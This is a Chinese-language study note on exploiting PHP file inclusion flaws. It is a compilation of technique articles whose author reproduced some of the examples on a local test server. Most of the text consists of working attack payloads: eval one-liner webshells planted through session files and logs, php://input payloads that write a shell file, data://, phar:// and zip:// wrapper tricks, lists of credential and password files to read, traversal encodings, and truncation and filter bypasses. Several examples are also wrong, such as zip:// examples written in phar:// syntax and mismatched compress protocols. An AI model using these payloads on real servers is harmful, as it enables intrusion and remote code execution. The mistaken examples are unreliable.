PHP文件包含学习笔记

看完下面的几篇文章，然后从第8行开始以后的内容可以忽略！此文是个笔记梳理，是对大佬文章简单的COPY记录，方便以后查看，自己只复现了其中的例子

参考文章：

PHP文件包含漏洞利用思路与Bypass总结手册1

PHP文件包含漏洞利用思路与Bypass总结手册2

PHP文件包含漏洞利用思路与Bypass总结手册3

Web安全实战系列：文件包含漏洞

以下是忽略部分：

简介：php中，利用include()、include_once()、require()、require_once()来包含文件时，不管被包含的文件是什么类型,都会直接被作为php文件进行解析。

一般存在文件包含的地方也存在着目录穿越漏洞

本地文件包含

PHP文件包含漏洞利用思路与Bypass总结手册1

Web安全实战系列：文件包含漏洞

条件：

php.ini配置文件中开启 allow_url_include

利用点：

读取本地敏感文件 `/etc/passwd` 等

敏感文件有：传送门

Windows：

c:\boot.ini // 查看系统版本

c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件

c:\windows\repair\sam // 存储Windows系统初次安装的密码

c:\ProgramFiles\mysql\my.ini // MySQL配置

c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root密码

c:\windows\php.ini // php 配置信息

C:\Windows\System32\inetsrv\config\applicationHost.config // IIS7.0+WIN 配置文件

Linux：

/etc/passwd // 账户信息

/etc/shadow // 账户密码文件

/usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件

/usr/local/app/apache2/conf/extra/httpd-vhost.conf // 虚拟网站配置

/usr/local/app/php5/lib/php.ini // PHP相关配置

/etc/httpd/conf/httpd.conf // Apache配置文件

/etc/init.d/httpd // Apache配置文件

/etc/my.conf // mysql 配置文件

读取网页源代码，审计

上传、下载、登陆、注册页面的具体代码

上传图片马，GETshell

上传包含一句话木马的图片即可，然后在页面中包含进来，菜刀或者蚁剑连接即可取得shell

包含日志文件 GETshell

(1) apache+Linux日志默认路径

    /etc/httpd/logs/access_log   或   /var/log/httpd/access_log

(2) apache+win2003日志默认路径

    D:\xampp\apache\logs\access.log

    D:\xampp\apache\logs\error.log

(3) IIS6.0+win2003默认日志文件

    C:\WINDOWS\system32\Logfiles

(4) IIS7.0+win2003 默认日志文件

    %SystemDrive%\inetpub\logs\LogFiles

(5) nginx 日志文件

    日志文件在用户安装目录logs目录下

        如安装路径为/usr/local/nginx,

        则日志目录在/usr/local/nginx/logs

其他日志类型请看 PHP文件包含漏洞利用思路与Bypass总结手册2

包含session文件 GETshell

条件：

session文件路径已知(可以通过phpinfo()信息泄露或者猜测得到)，且其中内容部分可控，比如session文件中会包含你的个人资料信息，这一部分是可控的。

PHP 默认将用户的 session 存在服务器的文件里，可以在php.ini里面设置session的存储位置session.save_path。

如下是phpinfo泄露的 session.save_path

Linux下一些默认session存储路径：

/var/lib/php/sess_PHPSESSID

/var/lib/php/sessions/sess_PHPSESSID

/tmp/sess_PHPSESSID

/tmp/sessions/sess_PHPSESSID

存储的 session 的文件名格式为 sess_[PHPSESSID] ，其中 PHPSESSID 可以在浏览器控制台 Application 里看到，也可以在cookie里看到

php 对 session 的存储常用的有三种处理方式：

session.serialize_handler=php（默认）

只对用户名的内容进行了序列化存储，没有对变量名进行序列化，可以看作是服务器对用户会话信息的半序列化存储过程。

比如：传入数据 username=test,那么变成session后存储为 username|s:4:"test";
session.serialize_handler=php_serialize

对整个session信息包括文件名、文件内容都进行了序列化处理，可以看作是服务器对用户会话信息的完全序列化存储过程。

比如：传入数据 username=test,那么变成session后存储为 a:1{s:8:"username";s:4:"test";}
session.serialize_handler=php_binary

键名的长度对应的ASCII字符 + 键名 + 经过serialize()函数反序列化处理的值

利用方式：前提是用户可以控制session文件中的一部分信息，然后将这部分信息变成我们构造的恶意代码，之后去包含含有我们传入恶意代码的这个session文件就可以达到攻击效果。

示例：

首先我们通过猜测或者通过文件包含漏洞得到 phpinfo 信息泄露查看到session文件存储的位置

session.php:

<?php

	session_start();

	$username = $_POST['username'];

	$_SESSION["username"] = $username;

?>

fileinc.php:

<?php

	$file  = $_GET['file'];

	include($file);

?>

然后我们访问 session.php,并传入参数 username=<?php eval($_POST[password]);?>

接下来查看浏览器控制台，找到对应 sessionid = bh1a7bbhuk196gl2v32qm8eono

然后便可以访问有文件包含漏洞的 fileinc.php 页面，包含存有一句话木马的 session 文件,并传参过去即可

session文件名为:sess_bh1a7bbhuk196gl2v32qm8eono,路径为：D:/software/xampp/sodevel-wnmp/web/phplearn/session_s/sess_bh1a7bbhuk196gl2v32qm8eono

访问http://127.0.0.1/phplearn/fileinc.php?file=D:/software/xampp/sodevel-wnmp/web/phplearn/session_s/sess_bh1a7bbhuk196gl2v32qm8eono，并且POST参数password=system(whoami)

这里注意：由于包含进去的session文件内容为为 username|s:34:"<?php eval($_REQUEST[password]);?>";，所以会报 NOTICE，测试环境为 windows，Linux好像不会

包含临时文件以及其他方法 GETshell

请看 PHP文件包含漏洞利用思路与Bypass总结手册2

远程文件包含

条件：

allow_url_include = on

allow_url_fopen = on

利用点:

包含远程 shell

把VPS上的shell包含进去

php 伪协议利用

PHP文件包含漏洞利用思路与Bypass总结手册1

可以在phpinfo中的Registered PHP Streams中找到可使用的协议：

file:// — 访问本地文件系统

http:// — 访问 HTTP(s) 网址

ftp:// — 访问 FTP(s) URLs

php:// — 访问各个输入/输出流（I/O streams）

zlib:// — 压缩流

data:// — 数据（RFC 2397）

glob:// — 查找匹配的文件路径模式

phar:// — PHP 归档

ssh2:// — Secure Shell 2

rar:// — RAR

ogg:// — 音频流

expect:// — 处理交互式的流

以下协议中的 fileinc.php 实验代码为：

<?php

    $file  = $_GET['file'];

    include($file);

?>

file://

条件：

file:// 协议在双off的情况下也可以正常使用；

allow_url_fopen ：off/on

allow_url_include：off/on

作用：

用于访问文件（绝对路径可以；相对路径有点问题）

示例：

http://127.0.0.1/fileinc.php?file=file:///etc/passsword

php://

总条件：

不需要开启allow_url_fopen，仅php://input、 php://stdin、 php://memory 和 php://temp 需要开启allow_url_include。

作用：访问输入输出流

①. php://filter

条件:

allow_url_fopen ：off/on

allow_url_include：off/on

作用：

读取源代码并进行base64编码输出

示例：

http://127.0.0.1/fileinc.php?file=php://filter/read=convert.base64-encode/resource=[文件名]（针对php文件需要base64编码）

http://127.0.0.1/fileinc.php?file=php://filter/convert.base64-encode/resource=[文件名] 不要read=也可以

参数：

resource=<要过滤的数据流> 这个参数是必须的。它指定了你要筛选过滤的数据流，可以是相对路径也可以是绝对路径

read=<读链的筛选列表> 该参数可选。可以设定一个或多个过滤器名称，以管道符（|）分隔。

write=<写链的筛选列表> 该参数可选。可以设定一个或多个过滤器名称，以管道符（|）分隔。

<；两个链的筛选列表> 任何没有以 read= 或 write= 作前缀的筛选器列表会视情况应用于读或写链。

②. php://input

条件：

allow_url_fopen ：off/on

allow_url_include：on

作用：

执行POST数据中的php代码

示例：

http://127.0.0.1/fileinc.php?file=php://input

POST数据：<?php phpinfo()?>

写木马文件：

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>

会在当前目录下写入一个木马

注意：

enctype="multipart/form-data" 的时候 php://input 是无效的

data://

条件：

php >= 5.2

allow_url_fopen ：on

allow_url_include：on

作用：

自PHP>=5.2.0起，可以使用data://数据流封装器，以传递相应格式的数据。通常可以用来执行PHP代码。一般需要用到base64编码传输

可用的数据流格式：

data:,<文本数据>

data:text/plain,<文本数据>

data:text/html,<HTML代码>

data:text/html;base64,<base64编码的HTML代码>

data:text/css,<CSS代码>

data:text/css;base64,<base64编码的CSS代码>

data:text/javascript,<Javascript代码>

data:text/javascript;base64,<base64编码的Javascript代码>

data:image/gif;base64,base64编码的gif图片数据

data:image/png;base64,base64编码的png图片数据

data:image/jpeg;base64,base64编码的jpeg图片数据

data:image/x-icon;base64,base64编码的icon图片数据

示例：

http://127.0.0.1/fileinc.php?file=data:text/plain,<?php phpinfo()?>

http://127.0.0.1/fileinc.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

phar://

条件：

php >= 5.3.0

注意：压缩包需要是zip协议压缩，rar不行，将木马文件压缩后，改为其他任意格式的文件都可以正常使用

作用：

配合文件上传漏洞getshell,突破文件上传格式的限制

示例：

特性：针对phar://不管后缀是什么，都会当做压缩包来解压。

?file=phar://[压缩包文件相对路径]/[压缩文件内的子文件名]

?file=phar://[压缩包文件绝对路径]/[压缩文件内的子文件名]

方法：写一个一句话木马文件shell.txt，然后用zip协议压缩为shell.zip，然后可以将后缀改为png等其他格式，突破上传限制。

比如:

相对路径

http://127.0.0.1/fileinc.php?file=phar://shell.zip/shell.txt

http://127.0.0.1/fileinc.php?file=phar://shell.png/shell.txt

绝对路径：

http://127.0.0.1/fileinc.php?file=phar://D:/software/xampp/sodevel-wnmp/web/phplearn/shell.zip/shell.txt

http://127.0.0.1/fileinc.php?file=phar://D:/software/xampp/sodevel-wnmp/web/phplearn/shell.png/shell.txt

其他：也支持用phar协议压缩的压缩文件，只是制作有些麻烦，作罢。不过感兴趣的可以看这里

zip://

条件：

想利用相对路径的话需要 php >=5.2.9

作用：

zip伪协议和phar协议类似，但是用法不一样。

示例：

特性：针对zip://不管后缀是什么，都会当做压缩包来解压。

?file=phar://[压缩包文件相对路径]#[压缩文件内的子文件名]

?file=phar://[压缩包文件绝对路径]#[压缩文件内的子文件名]

注意点：当在URl中直接利用时， # 需要使用编码成 %23

方法：写一个一句话木马文件shell.txt，然后用zip协议压缩为shell.zip，然后可以将后缀改为png等其他格式，突破上传限制。

比如：

相对路径：

http://127.0.0.1/fileinc.php?file=zip://shell.png%23shell.txt

绝对路径：

http://127.0.0.1/fileinc.php?file=zip://D:/software/xampp/sodevel-wnmp/web/phplearn/shell.png%23shell.txt

compress.xxx

条件：

php >= 5.2

作用：

配合文件上传漏洞getshell,突破文件上传格式的限制

①compress.bzip2://

示例：

?file=compress.bzip2://[压缩包文件相对路径]

?file=compress.bzip2://[压缩包文件绝对路径]

方法：写一个一句话木马文件shell.txt，然后用bz2协议压缩为shell.bz2，然后可以将后缀改为png等其他格式，突破上传限制。

比如：

相对路径：

http://127.0.0.1/fileinc.php?file=compress.bzip2://shell.bz2

http://127.0.0.1/fileinc.php?file=compress.bzip2://shell.png

绝对路径：

http://127.0.0.1/fileinc.php?file=zip://D:/software/xampp/sodevel-wnmp/web/phplearn/shell.bz2

http://127.0.0.1/fileinc.php?file=zip://D:/software/xampp/sodevel-wnmp/web/phplearn/shell.png

②compress.zlib://

示例：

?file=compress.zlib://[压缩包文件相对路径]

?file=compress.zlib://[压缩包文件绝对路径]

方法：写一个一句话木马文件shell.txt，然后用zlib协议压缩为shell.zip，然后可以将后缀改为png等其他格式，突破上传限制。

比如：

相对路径：

http://127.0.0.1/fileinc.php?file=compress.bzip2://shell.gz

http://127.0.0.1/fileinc.php?file=compress.bzip2://shell.png

绝对路径：

http://127.0.0.1/fileinc.php?file=zip://D:/software/xampp/sodevel-wnmp/web/phplearn/shell.gz

http://127.0.0.1/fileinc.php?file=zip://D:/software/xampp/sodevel-wnmp/web/phplearn/shell.png

Bypass

参考文章：PHP文件包含漏洞利用思路与Bypass总结手册3

指定前缀

例如：

<?php

	$file = $_GET['file'];

	include '/var/www/html/'.$file;

?>

方法：

目录穿越

条件：

../没有被过滤或可以被绕过

示例：

？file=../../../etc/passwd

绕过过滤：

使用 URL 编码： ../ ----> %2e%2e%2f ----> 二次编码 %252e%252e%252f
利用Windows特性： ..\ ，也可以编码为 %2e%2e%5c ----> 二次编码 %252e%252e%255c
其他

某些web容器支持的编码方式:

../   ---->  ..%c0%af

PS：Why does Directory traversal attack %C0%AF work?

%c0%ae%c0%ae/

PS：java中会把”%c0%ae”解析为”\uC0AE”，最后转义为ASCCII字符的”.”（点）

..\   ---->  ..%c1%9c

指定后缀

例如：

<?php

	$file = $_GET['file'];

	include $file.'/test/index.php';

?>

方法：

利用 URL 中的 ? 和 #

条件：

allow_url_include = on

allow_url_fopen = on

示例：

当输入?file=http://www.xxx.com/phpinfo.txt?  包含时变成了 http://www.xxx.com/phpinfo.txt?/test/index.php

问号后面的部分/test/index.php，也就是指定的后缀被当作query从而被绕过,实际包含的文件为 http://www.xxx.com 上的 phpinfo.txt

当输入?file=http://www.xxx.com/phpinfo.txt%23  包含时变成了 http://www.xxx.com/phpinfo.txt#/test/index.php

#号后面的部分/test/index.php，也就是指定的后缀被当作fragment(定位符)从而被绕过,实际包含的文件为 http://www.xxx.com 上的 phpinfo.txt

注意：这里的 # 需要 url编码

利用 phar:// 或者 zip:// 或者 compress.xxx:// 协议构造特殊结构的压缩包

条件：

php >= 5.3.0

示例：

phar://

当输入?file=phar://evil.zip/evil  包含时变成了 ?file=phar://evil.zip/evil/test/index.php

巧妙地利用了压缩包突破了限制

当然这里也可以使用绝对路径，以及更改压缩包的名字为 evil.png 等

zip://

当输入?file=zip://evil.zip%23evil  包含时变成了 ?file=zip://evil.zip%23evil/test/index.php

巧妙地利用了压缩包突破了限制

当然这里也可以使用绝对路径，以及更改压缩包的名字为 evil.png 等

长度截断

条件：

php < 5.2.8

原理：

Windows下目录最大长度为256字节，超出的部分会被丢弃
Linux下目录最大长度为4096字节，超出的部分会被丢弃

零字节截断

条件：

php < 5.3.4

magic_quotes_gpc=Off

示例：

?file=phpinfo.txt%00

协议限制

限制了 data:// 协议

示例：

<?php

	error_reporting(0);

	$filename = $_GET['filename'];

	if (preg_match("/\bdata\b/iA", $filename)) {

    	echo "stop hacking!!!!\n";

	}

	else{

        include $filename;

	}

?>

代码表示不能以 data 字符串开头

方法：

利用zlib协议嵌套的方法绕过对 data:// 协议的限制

?filename=compress.zlib://data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

allow_url_fopen=Off

由于远程文件包含只对 http 和 ftp 协议生效，所以可以使用其他协议从而绕过限制

参考：PHP文件包含漏洞利用思路与Bypass总结手册3 的最后一点